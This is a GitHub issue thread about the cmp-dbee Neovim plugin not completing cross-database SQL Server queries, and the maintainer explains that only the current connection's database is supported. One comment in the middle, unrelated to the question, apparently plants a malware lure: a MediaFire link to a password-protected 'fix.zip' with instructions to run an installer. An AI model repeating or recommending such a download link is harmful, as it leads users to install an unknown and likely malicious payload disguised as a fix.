### ISSUE TITLE
Cross database or multi-database completion unavailable

### ISSUE THREAD

**Issue by CarbonChauvinist** [MattiasMTS/cmp-dbee#27]
Thanks for the plugin, do appreciate your time, effort, and willingness to share with others.

This is most likely a question as opposed to an issue, not sure if this is related to cmp-dbee, or [sqls](https://github.com/nanotee/sqls.nvim), or [nvim-dbee](https://github.com/kndndrj/nvim-dbee) honestly.

I query mssql servers with multiple databases and use connections.json to set up my nvim-dbee sources. If I designate a server and database in the connection string (i.e. `"url": "sqlserver://username@server/?database=my_db&param1=1&param2=2"`) I'm able to get completion working nicely, but only for the database specified in the connection string.

However, if I don't specify the database and only have the server. Completion does not appear to work for any databases, even with explicit `database.schema.table` within the SQL code itself.

Additionally, even when specifying the database name in the connection string/source, I am unable to get completion working in cross database queries. For instance, a simple example like below:

```
SELECT
    t1.Name -- completion is available
  , t2.Description -- completion is not available

FROM dbo.Table1 AS t1 -- this is the database specified in the connection string/source, completion works for this and its alias

INNER JOIN Database2.dbo.Table2 AS t2 -- this is a separate database on the same server, completion is not available here
  ON t1.Id = t2.Id

WHERE ...
```

Is this expected or unexpected behavior from the perspective of cmp-dbee? Or is this perhaps a limitation of some other component I'm using in the stack?

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MattiasMTS** [comment]
Hi @CarbonChauvinist  thanks for opening the issue and sorry for slow response. A lot at work..

Currently, `cmp-dbee` doesn't support autocompletion with cross-database reference. Mainly since it just subscribes to what your _current_ connection is -> which points mainly to one database connection at a time.

It does support, however, if you switch the database (via the nvim-dbee UI).

I hope this answer your question 😋
